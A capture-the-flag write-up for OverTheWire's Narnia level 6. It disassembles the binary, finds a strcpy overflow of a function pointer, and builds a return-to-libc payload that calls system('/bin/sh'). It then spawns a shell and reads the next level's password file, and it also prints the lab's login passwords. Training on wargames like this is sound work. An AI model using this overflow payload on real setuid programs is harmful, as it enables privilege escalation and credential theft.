Contents

Narnia Challenges (part 4)

narnia6

How to log into Narnia:

ssh -p 2226 narnia6@narnia.labs.overthewire.org

Password: neezocaeng Where to find all of the challenges:

cd /narnia/

Try running:

1
2
3
4
narnia6@narnia:/narnia$ ./narnia6
./narnia6 b1 b2
narnia6@narnia:/narnia$ ./narnia6 AAAA BBBB
AAAA

Two different buffers are passed via args. Time to take a look at objdump and see how these are used.

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
narnia6@narnia:/narnia$ objdump -M intel -d narnia6 | awk -F"\n" -v RS="\n\n" '$1 ~ /main>/'

080485a8 <main>:
 80485a8: 55                   push   ebp
 80485a9: 89 e5                mov    ebp,esp
 80485ab: 53                   push   ebx
 80485ac: 83 ec 18             sub    esp,0x18
 80485af: c7 45 f4 30 84 04 08 mov    DWORD PTR [ebp-0xc],0x8048430
 80485b6: 83 7d 08 03          cmp    DWORD PTR [ebp+0x8],0x3
 80485ba: 74 1a                je     80485d6 <main+0x2e>
 80485bc: 8b 45 0c             mov    eax,DWORD PTR [ebp+0xc]
 80485bf: 8b 00                mov    eax,DWORD PTR [eax]
 80485c1: 50                   push   eax
 80485c2: 68 80 87 04 08       push   0x8048780
 80485c7: e8 34 fe ff ff       call   8048400 <printf@plt>
 80485cc: 83 c4 08             add    esp,0x8
 80485cf: 6a ff                push   0xffffffff
 80485d1: e8 6a fe ff ff       call   8048440 <exit@plt>
 80485d6: c7 45 f8 00 00 00 00 mov    DWORD PTR [ebp-0x8],0x0
 80485dd: eb 39                jmp    8048618 <main+0x70>
 80485df: a1 e8 99 04 08       mov    eax,ds:0x80499e8
 80485e4: 8b 55 f8             mov    edx,DWORD PTR [ebp-0x8]
 80485e7: c1 e2 02             shl    edx,0x2
 80485ea: 01 d0                add    eax,edx
 80485ec: 8b 00                mov    eax,DWORD PTR [eax]
 80485ee: 50                   push   eax
 80485ef: e8 6c fe ff ff       call   8048460 <strlen@plt>
 80485f4: 83 c4 04             add    esp,0x4
 80485f7: 89 c1                mov    ecx,eax
 80485f9: a1 e8 99 04 08       mov    eax,ds:0x80499e8
 80485fe: 8b 55 f8             mov    edx,DWORD PTR [ebp-0x8]
 8048601: c1 e2 02             shl    edx,0x2
 8048604: 01 d0                add    eax,edx
 8048606: 8b 00                mov    eax,DWORD PTR [eax]
 8048608: 51                   push   ecx
 8048609: 6a 00                push   0x0
 804860b: 50                   push   eax
 804860c: e8 6f fe ff ff       call   8048480 <memset@plt>
 8048611: 83 c4 0c             add    esp,0xc
 8048614: 83 45 f8 01          add    DWORD PTR [ebp-0x8],0x1
 8048618: a1 e8 99 04 08       mov    eax,ds:0x80499e8
 804861d: 8b 55 f8             mov    edx,DWORD PTR [ebp-0x8]
 8048620: c1 e2 02             shl    edx,0x2
 8048623: 01 d0                add    eax,edx
 8048625: 8b 00                mov    eax,DWORD PTR [eax]
 8048627: 85 c0                test   eax,eax
 8048629: 75 b4                jne    80485df <main+0x37>
 804862b: c7 45 f8 03 00 00 00 mov    DWORD PTR [ebp-0x8],0x3
 8048632: eb 3d                jmp    8048671 <main+0xc9>
 8048634: 8b 45 f8             mov    eax,DWORD PTR [ebp-0x8]
 8048637: 8d 14 85 00 00 00 00 lea    edx,[eax*4+0x0]
 804863e: 8b 45 0c             mov    eax,DWORD PTR [ebp+0xc]
 8048641: 01 d0                add    eax,edx
 8048643: 8b 00                mov    eax,DWORD PTR [eax]
 8048645: 50                   push   eax
 8048646: e8 15 fe ff ff       call   8048460 <strlen@plt>
 804864b: 83 c4 04             add    esp,0x4
 804864e: 89 c2                mov    edx,eax
 8048650: 8b 45 f8             mov    eax,DWORD PTR [ebp-0x8]
 8048653: 8d 0c 85 00 00 00 00 lea    ecx,[eax*4+0x0]
 804865a: 8b 45 0c             mov    eax,DWORD PTR [ebp+0xc]
 804865d: 01 c8                add    eax,ecx
 804865f: 8b 00                mov    eax,DWORD PTR [eax]
 8048661: 52                   push   edx
 8048662: 6a 00                push   0x0
 8048664: 50                   push   eax
 8048665: e8 16 fe ff ff       call   8048480 <memset@plt>
 804866a: 83 c4 0c             add    esp,0xc
 804866d: 83 45 f8 01          add    DWORD PTR [ebp-0x8],0x1
 8048671: 8b 45 f8             mov    eax,DWORD PTR [ebp-0x8]
 8048674: 8d 14 85 00 00 00 00 lea    edx,[eax*4+0x0]
 804867b: 8b 45 0c             mov    eax,DWORD PTR [ebp+0xc]
 804867e: 01 d0                add    eax,edx
 8048680: 8b 00                mov    eax,DWORD PTR [eax]
 8048682: 85 c0                test   eax,eax
 8048684: 75 ae                jne    8048634 <main+0x8c>
 8048686: 8b 45 0c             mov    eax,DWORD PTR [ebp+0xc]
 8048689: 83 c0 04             add    eax,0x4
 804868c: 8b 00                mov    eax,DWORD PTR [eax]
 804868e: 50                   push   eax
 804868f: 8d 45 ec             lea    eax,[ebp-0x14]
 8048692: 50                   push   eax
 8048693: e8 88 fd ff ff       call   8048420 <strcpy@plt>
 8048698: 83 c4 08             add    esp,0x8
 804869b: 8b 45 0c             mov    eax,DWORD PTR [ebp+0xc]
 804869e: 83 c0 08             add    eax,0x8
 80486a1: 8b 00                mov    eax,DWORD PTR [eax]
 80486a3: 50                   push   eax
 80486a4: 8d 45 e4             lea    eax,[ebp-0x1c]
 80486a7: 50                   push   eax
 80486a8: e8 73 fd ff ff       call   8048420 <strcpy@plt>
 80486ad: 83 c4 08             add    esp,0x8
 80486b0: 8b 45 f4             mov    eax,DWORD PTR [ebp-0xc]
 80486b3: 25 00 00 00 ff       and    eax,0xff000000
 80486b8: 89 c3                mov    ebx,eax
 80486ba: e8 dc fe ff ff       call   804859b <get_sp>
 80486bf: 39 c3                cmp    ebx,eax
 80486c1: 75 07                jne    80486ca <main+0x122>
 80486c3: 6a ff                push   0xffffffff
 80486c5: e8 76 fd ff ff       call   8048440 <exit@plt>
 80486ca: e8 41 fd ff ff       call   8048410 <geteuid@plt>
 80486cf: 89 c3                mov    ebx,eax
 80486d1: e8 3a fd ff ff       call   8048410 <geteuid@plt>
 80486d6: 53                   push   ebx
 80486d7: 50                   push   eax
 80486d8: e8 73 fd ff ff       call   8048450 <setreuid@plt>
 80486dd: 83 c4 08             add    esp,0x8
 80486e0: 8d 45 ec             lea    eax,[ebp-0x14]
 80486e3: 50                   push   eax
 80486e4: 8b 45 f4             mov    eax,DWORD PTR [ebp-0xc]
 80486e7: ff d0                call   eax
 80486e9: 83 c4 04             add    esp,0x4
 80486ec: 6a 01                push   0x1
 80486ee: e8 4d fd ff ff       call   8048440 <exit@plt>
 80486f3: 66 90                xchg   ax,ax
 80486f5: 66 90                xchg   ax,ax
 80486f7: 66 90                xchg   ax,ax
 80486f9: 66 90                xchg   ax,ax
 80486fb: 66 90                xchg   ax,ax
 80486fd: 66 90                xchg   ax,ax
 80486ff: 90                   nop

First up is to reserve 0x18 (24 bytes) on the stack:

1
 80485ac: 83 ec 18             sub    esp,0x18

Taking a quick peek at this address: 0x8048430, seems to correspond to the puts function:

1
2
3
4
08048430 <puts@plt>:
 8048430:       ff 25 c8 99 04 08       jmp    DWORD PTR ds:0x80499c8
 8048436:       68 18 00 00 00          push   0x18
 804843b:       e9 b0 ff ff ff          jmp    80483f0 <.plt>

So, store the address of a function onto the stack:

1
 80485af: c7 45 f4 30 84 04 08 mov    DWORD PTR [ebp-0xc],0x8048430

Per usual we see that this is likely looking at argc (argv seems to start at 0xc):

1
 80485b6: 83 7d 08 03          cmp    DWORD PTR [ebp+0x8],0x3

And doing a comparison for 3, so the application is expecting ONLY two inputs:

1
2
narnia6@narnia:/narnia$ ./narnia6 a b c
./narnia6 b1 b2

If the comparison fails, then a usage message is printed out, and then exit the program:

1
2
3
4
5
6
7
8
 80485bc: 8b 45 0c             mov    eax,DWORD PTR [ebp+0xc]
 80485bf: 8b 00                mov    eax,DWORD PTR [eax]
 80485c1: 50                   push   eax
 80485c2: 68 80 87 04 08       push   0x8048780
 80485c7: e8 34 fe ff ff       call   8048400 <printf@plt>
 80485cc: 83 c4 08             add    esp,0x8
 80485cf: 6a ff                push   0xffffffff
 80485d1: e8 6a fe ff ff       call   8048440 <exit@plt>

For completeness with gdb it is possible to see the contents of 0x8048780:

1
2
(gdb) x/s 0x8048780
0x8048780: "%s b1 b2\n"

Next up get a little weird, but the overall flow seems to indicate a loop similar to what was seen on narnia4. Keep in mind that main is 0x080485a8 .

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
 80485d6: c7 45 f8 00 00 00 00 mov    DWORD PTR [ebp-0x8],0x0
 80485dd: eb 39                jmp    8048618 <main+0x70>
 80485df: a1 e8 99 04 08       mov    eax,ds:0x80499e8
 80485e4: 8b 55 f8             mov    edx,DWORD PTR [ebp-0x8]
 80485e7: c1 e2 02             shl    edx,0x2
 80485ea: 01 d0                add    eax,edx
 80485ec: 8b 00                mov    eax,DWORD PTR [eax]
 80485ee: 50                   push   eax
 80485ef: e8 6c fe ff ff       call   8048460 <strlen@plt>
 80485f4: 83 c4 04             add    esp,0x4
 80485f7: 89 c1                mov    ecx,eax
 80485f9: a1 e8 99 04 08       mov    eax,ds:0x80499e8
 80485fe: 8b 55 f8             mov    edx,DWORD PTR [ebp-0x8]
 8048601: c1 e2 02             shl    edx,0x2
 8048604: 01 d0                add    eax,edx
 8048606: 8b 00                mov    eax,DWORD PTR [eax]
 8048608: 51                   push   ecx
 8048609: 6a 00                push   0x0
 804860b: 50                   push   eax
 804860c: e8 6f fe ff ff       call   8048480 <memset@plt>
 8048611: 83 c4 0c             add    esp,0xc
 8048614: 83 45 f8 01          add    DWORD PTR [ebp-0x8],0x1
 8048618: a1 e8 99 04 08       mov    eax,ds:0x80499e8
 804861d: 8b 55 f8             mov    edx,DWORD PTR [ebp-0x8]
 8048620: c1 e2 02             shl    edx,0x2
 8048623: 01 d0                add    eax,edx
 8048625: 8b 00                mov    eax,DWORD PTR [eax]
 8048627: 85 c0                test   eax,eax
 8048629: 75 b4                jne    80485df <main+0x37>

First, initialize the loop counter:

1
 80485d6: c7 45 f8 00 00 00 00 mov    DWORD PTR [ebp-0x8],0x0

So here’s where things get weird, the very next thing is to actually jump past everything that would happen, so given that main is 0x080485a8 + 0x70 = 0x08048618:

1
 80485dd: eb 39                jmp    8048618 <main+0x70>

Takes the program to here:

1
 8048618: a1 e8 99 04 08       mov    eax,ds:0x80499e8

A quick peek with objdmp, we can see that the data segment corresponds to the environ again.

1
080499e8 <__environ@@GLIBC_2.0>

The next few lines of assembly deal with getting the current value of the loop counter and then using that to index into envrion, aka envrion[i]:

1
2
3
4
 804861d: 8b 55 f8             mov    edx,DWORD PTR [ebp-0x8]
 8048620: c1 e2 02             shl    edx,0x2
 8048623: 01 d0                add    eax,edx
 8048625: 8b 00                mov    eax,DWORD PTR [eax]

After that it’s tested to see if the value is 0, if not then jump back to an earlier point in the program and do the real work. This is a bit counter intuitive as a loop in C looks like:

1
2
3
for (int i = 0; i < 10; i++) {
 // do something
}

And it stands to reason that the execution would be initialize a the variable, test, then jump. More details about this can be found here.

Now that we have a rough idea that this loop seems to be dealing with environ, it should be easier to put together what is actually happening inside of the loop. The following code gets the strlen of environ[i] and then stores the result into $ecx.

1
2
3
4
5
6
7
8
9
 80485df: a1 e8 99 04 08       mov    eax,ds:0x80499e8
 80485e4: 8b 55 f8             mov    edx,DWORD PTR [ebp-0x8]
 80485e7: c1 e2 02             shl    edx,0x2
 80485ea: 01 d0                add    eax,edx
 80485ec: 8b 00                mov    eax,DWORD PTR [eax]
 80485ee: 50                   push   eax
 80485ef: e8 6c fe ff ff       call   8048460 <strlen@plt>
 80485f4: 83 c4 04             add    esp,0x4
 80485f7: 89 c1                mov    ecx,eax

After that it gets the address of environ[i], puts that on the stack, along with NULL, and the previous sorted out strlen value, followed by a call to memset.

1
2
3
4
5
6
7
8
9
 80485f9: a1 e8 99 04 08       mov    eax,ds:0x80499e8
 80485fe: 8b 55 f8             mov    edx,DWORD PTR [ebp-0x8]
 8048601: c1 e2 02             shl    edx,0x2
 8048604: 01 d0                add    eax,edx
 8048606: 8b 00                mov    eax,DWORD PTR [eax]
 8048608: 51                   push   ecx
 8048609: 6a 00                push   0x0
 804860b: 50                   push   eax
 804860c: e8 6f fe ff ff       call   8048480 <memset@plt>

The next bit of code does something very similar except that it doesn’t memset the environ, but instead something else, another notable thing is that the loop counter starts at 0x3 instead of 0x1:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
 804862b: c7 45 f8 03 00 00 00 mov    DWORD PTR [ebp-0x8],0x3
 8048632: eb 3d                jmp    8048671 <main+0xc9>
 8048634: 8b 45 f8             mov    eax,DWORD PTR [ebp-0x8]
 8048637: 8d 14 85 00 00 00 00 lea    edx,[eax*4+0x0]
 804863e: 8b 45 0c             mov    eax,DWORD PTR [ebp+0xc]
 8048641: 01 d0                add    eax,edx
 8048643: 8b 00                mov    eax,DWORD PTR [eax]
 8048645: 50                   push   eax
 8048646: e8 15 fe ff ff       call   8048460 <strlen@plt>
 804864b: 83 c4 04             add    esp,0x4
 804864e: 89 c2                mov    edx,eax
 8048650: 8b 45 f8             mov    eax,DWORD PTR [ebp-0x8]
 8048653: 8d 0c 85 00 00 00 00 lea    ecx,[eax*4+0x0]
 804865a: 8b 45 0c             mov    eax,DWORD PTR [ebp+0xc]
 804865d: 01 c8                add    eax,ecx
 804865f: 8b 00                mov    eax,DWORD PTR [eax]
 8048661: 52                   push   edx
 8048662: 6a 00                push   0x0
 8048664: 50                   push   eax
 8048665: e8 16 fe ff ff       call   8048480 <memset@plt>
 804866a: 83 c4 0c             add    esp,0xc
 804866d: 83 45 f8 01          add    DWORD PTR [ebp-0x8],0x1
 8048671: 8b 45 f8             mov    eax,DWORD PTR [ebp-0x8]
 8048674: 8d 14 85 00 00 00 00 lea    edx,[eax*4+0x0]
 804867b: 8b 45 0c             mov    eax,DWORD PTR [ebp+0xc]
 804867e: 01 d0                add    eax,edx
 8048680: 8b 00                mov    eax,DWORD PTR [eax]
 8048682: 85 c0                test   eax,eax
 8048684: 75 ae                jne    8048634 <main+0x8c>

Once again this seems to be operating on argv[]:

1
 804863e: 8b 45 0c             mov    eax,DWORD PTR [ebp+0xc]

And this is calculating the index into argv based on the loop counter (starting at 3) on the stack:

1
2
3
4
5
 8048634: 8b 45 f8             mov    eax,DWORD PTR [ebp-0x8]
 8048637: 8d 14 85 00 00 00 00 lea    edx,[eax*4+0x0]
 804863e: 8b 45 0c             mov    eax,DWORD PTR [ebp+0xc]
 8048641: 01 d0                add    eax,edx
 8048643: 8b 00                mov    eax,DWORD PTR [eax]

Followed by a strlen, and a memset to NULL.

So what we have now is two loops that NULL out both the environ and any arguments > argv[3]. Remember, argv[0] = binary, argv[1] = b1, argv[2] = b2.

After that it looks like the contents of argv[1] and argv[2] are copied into some buffers on the stack:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
 8048686: 8b 45 0c             mov    eax,DWORD PTR [ebp+0xc]
 8048689: 83 c0 04             add    eax,0x4
 804868c: 8b 00                mov    eax,DWORD PTR [eax]
 804868e: 50                   push   eax
 804868f: 8d 45 ec             lea    eax,[ebp-0x14]
 8048692: 50                   push   eax
 8048693: e8 88 fd ff ff       call   8048420 <strcpy@plt>
 8048698: 83 c4 08             add    esp,0x8
 804869b: 8b 45 0c             mov    eax,DWORD PTR [ebp+0xc]
 804869e: 83 c0 08             add    eax,0x8
 80486a1: 8b 00                mov    eax,DWORD PTR [eax]
 80486a3: 50                   push   eax
 80486a4: 8d 45 e4             lea    eax,[ebp-0x1c]
 80486a7: 50                   push   eax
 80486a8: e8 73 fd ff ff       call   8048420 <strcpy@plt>

Going back to how much we allocated on the stack, it should be possible to deduce the size of these buffers (keeping in mind that $esp starts 4 bytes lower than $ebp, which is why the math for calculation the locations of the buffers looks off):

1
 80485ac: 83 ec 18             sub    esp,0x18

A function pointer on the stack (4 bytes), so this becomes 0xc - 0x4(for offsetting to $esp) - 0x4 to get to $ebp-0x4.

1
 80485af: c7 45 f4 30 84 04 08 mov    DWORD PTR [ebp-0xc],0x8048430

A loop counter (4 bytes):

1
 80485d6: c7 45 f8 00 00 00 00 mov    DWORD PTR [ebp-0x8],0x0

A buffer (buffer1), same deal here 0x14 - 0x4 (for offsetting to $esp) = 0x10 - (0xc - 0x4) = 0x8 (8 bytes):

1
 804868f: 8d 45 ec             lea    eax,[ebp-0x14]

Another buffer (buffer2), same deal here another 8 bytes:

1
 80486a4: 8d 45 e4             lea    eax,[ebp-0x1c]

This lines up with what we reserved on the stack, 8 bytes for buf1, 8 bytes for buf2, 4 bytes for the function pointer, and 4 bytes for the loop counter. The purpose of that exercise is to highlight that argv is being copied into a buffer that only has 8 bytes avail to it. Seems like an easy place to exploit some sort of an overflow. Next up is some strange comparison with the function pointer. First move the address of the function pointer into $eax, then AND with 0xff000000 (storing the result into $eax).

1
2
3
 80486b0: 8b 45 f4             mov    eax,DWORD PTR [ebp-0xc]
 80486b3: 25 00 00 00 ff       and    eax,0xff000000
 80486b8: 89 c3                mov    ebx,eax

The actual comparison

1
2
 80486ba: e8 dc fe ff ff       call   804859b <get_sp>
 80486bf: 39 c3                cmp    ebx,eax

If the comparison succeeds the program just exits right away. If they aren’t equal, then it goes on to execute some interesting code - the good o’le getuid, and setreuid:

1
2
3
4
5
6
7
 80486ca: e8 41 fd ff ff       call   8048410 <geteuid@plt>
 80486cf: 89 c3                mov    ebx,eax
 80486d1: e8 3a fd ff ff       call   8048410 <geteuid@plt>
 80486d6: 53                   push   ebx
 80486d7: 50                   push   eax
 80486d8: e8 73 fd ff ff       call   8048450 <setreuid@plt>
 80486dd: 83 c4 08             add    esp,0x8

This gets buffer1 and then provides that as input to the function pointer of puts that’s on the stack.

1
2
3
4
 80486e0: 8d 45 ec             lea    eax,[ebp-0x14]          # Addr of buffer1
 80486e3: 50                   push   eax
 80486e4: 8b 45 f4             mov    eax,DWORD PTR [ebp-0xc] # Addr of puts
 80486e7: ff d0                call   eax

With all of this we can start crafting an exploit. First, it’s easy to take control over the $eip:

1
2
3
4
5
6
7
narnia6@narnia:/narnia$ gdb -q narnia6
Reading symbols from narnia6...(no debugging symbols found)...done.
(gdb) r AAAABBBBCCCC DDDDEEEEFFFF
Starting program: /narnia/narnia6 AAAABBBBCCCC DDDDEEEEFFFF

Program received signal SIGSEGV, Segmentation fault.
0x43434343 in ?? ()

Looking at the stack shows a better picture of what has happened:

After the first copy:

1
2
3
4
5
6
(gdb) x/20xw $esp
0xffffd684: 0xffffd694 0xffffd881 0x08048721 0xf7fc53dc
0xffffd694: 0x41414141 0x42424242 0x43434343 0x00000000
0xffffd6a4: 0x00000000 0x00000000 0xf7e2a286 0x00000003
0xffffd6b4: 0xffffd744 0xffffd754 0x00000000 0x00000000
0xffffd6c4: 0x00000000 0xf7fc5000 0xf7ffdc0c 0xf7ffd000

After the second copy:

1
2
3
4
5
6
(gdb) x/20xw $esp
0xffffd684: 0xffffd68c 0xffffd88e 0x44444444 0x45454545
0xffffd694: 0x46464646 0x42424200 0x43434343 0x00000000
0xffffd6a4: 0x00000000 0x00000000 0xf7e2a286 0x00000003
0xffffd6b4: 0xffffd744 0xffffd754 0x00000000 0x00000000
0xffffd6c4: 0x00000000 0xf7fc5000 0xf7ffdc0c 0xf7ffd000

Something to keep in mind here, both of the buffers are too small to store the shellcode that was created in narnia1. So we need to rely on some other method for getting some system call to a shell to be made. What comes to mind since we have buffer limitations is the Return-To-LibC Exploit that was used for narnia4. Grabbing the address of system it is possible to craft and exploit that allows for calling system and using the second buffer as a way to provide a known address for /bin/sh:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
(gdb) r  $(python -c 'print "A"*8 + "\x50\xc8\xe4\xf7"') $(python -c 'print "B"*8 + "/bin/sh"')
Starting program: /narnia/narnia6 $(python -c 'print "A"*8 + "\x50\xc8\xe4\xf7"') $(python -c 'print "B"*8 + "/bin/sh"')

Breakpoint 1, 0x080485ac in main ()
(gdb) b *0x080486ad
Breakpoint 2 at 0x80486ad
(gdb) c
Continuing.

Breakpoint 2, 0x080486ad in main ()
(gdb) x/40xw $esp
0xffffd674: 0xffffd67c 0xffffd88b 0x42424242 0x42424242
0xffffd684: 0x6e69622f 0x0068732f 0xf7e4c850 0x00000000
0xffffd694: 0x00000000 0x00000000 0xf7e2a286 0x00000003
0xffffd6a4: 0xffffd734 0xffffd744 0x00000000 0x00000000
0xffffd6b4: 0x00000000 0xf7fc5000 0xf7ffdc0c 0xf7ffd000
0xffffd6c4: 0x00000000 0x00000003 0xf7fc5000 0x00000000
0xffffd6d4: 0x3257cff0 0x08be03e0 0x00000000 0x00000000
0xffffd6e4: 0x00000000 0x00000003 0x080484a0 0x00000000
0xffffd6f4: 0xf7fee710 0xf7e2a199 0xf7ffd000 0x00000003
0xffffd704: 0x080484a0 0x00000000 0x080484c1 0x080485a8

The B’s from the exploit can be found here: 0x42424242 0x42424242

/bin/sh found here: 0x6e69622f 0x0068732f

Address of system here: 0xf7e4c850

And the real run:

1
2
3
narnia6@narnia:/narnia$ ./narnia6 $(python -c 'print "A"*8 + "\x50\xc8\xe4\xf7"') $(python -c 'print "B"*8 + "/bin/sh"')
$ whoami
narnia7

And the password:

1
2
$ cat /etc/narnia_pass/narnia7
ahkiaziphu

A bit more on the loops

To further unravel the mystery of what the assembly structured the loop in this manner, I went over to https://godbolt.org and used the source from narnia6.c. It turns out with gcc versions prior to 5.x, the loops are structured like the assembly we found when dumping the binary for narnia6. With newer versions of gcc, the structure is more like I was expecting:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
mov dword ptr [rbp - 44], 0
.LBB1_3: # =>This Inner Loop Header: Depth=1
mov rax, qword ptr [environ]
movsxd rcx, dword ptr [rbp - 44]
cmp qword ptr [rax + 8*rcx], 0
je .LBB1_6
xor esi, esi
mov rax, qword ptr [environ]
movsxd rcx, dword ptr [rbp - 44]
mov rdi, qword ptr [rax + 8*rcx]
mov rax, qword ptr [environ]
movsxd rcx, dword ptr [rbp - 44]
mov rax, qword ptr [rax + 8*rcx]
mov qword ptr [rbp - 56], rdi # 8-byte Spill
mov rdi, rax
mov dword ptr [rbp - 60], esi # 4-byte Spill
call strlen
mov rdi, qword ptr [rbp - 56] # 8-byte Reload
mov esi, dword ptr [rbp - 60] # 4-byte Reload
mov rdx, rax
call memset
mov eax, dword ptr [rbp - 44]
add eax, 1
mov dword ptr [rbp - 44], eax
jmp .LBB1_3

I’ve tried briefly digging to determine why this was happening in the earlier versions of gcc, but didn’t turn up anything obvious.